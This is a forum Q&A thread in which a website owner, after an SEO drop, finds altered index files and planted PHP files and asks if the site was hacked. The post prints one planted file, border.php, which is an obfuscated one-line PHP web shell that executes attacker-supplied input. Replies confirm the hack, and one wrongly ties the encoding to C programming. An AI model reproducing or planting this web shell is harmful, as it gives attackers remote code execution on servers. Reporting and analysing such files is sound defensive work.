skip to Main Content

so I noticed a drop in my SEO search results off google and then I went to go change my meta keywords in my index.html page.

I noticed that my index.html was changed to index1.html and then duplicated to index.php

this code was added to the very top of that php code
https://pastebin.com/yVUP3dHZ

This file was also added to my files hagdfi.php and
https://pastebin.com/p776yxdV

so was this one border.php

<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);?>abcabcabc

What happened? was I being hacked?

2

Answers


  1. It’s safe to assume that if you didn’t put it there, and you are in control of that page, then it should not be there.

    I would replace the index page with a backup and then see if you can find out through your provider how to keep it from happening again.

    Trust nothing, verify everything!

    Login or Signup to reply.
  2. you have been hacked. the code in the file has been encoded. I don’t mastering this encoding but it’s more using in c programming. you can use this for analysing the file : https://malwaredecoder.com/

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search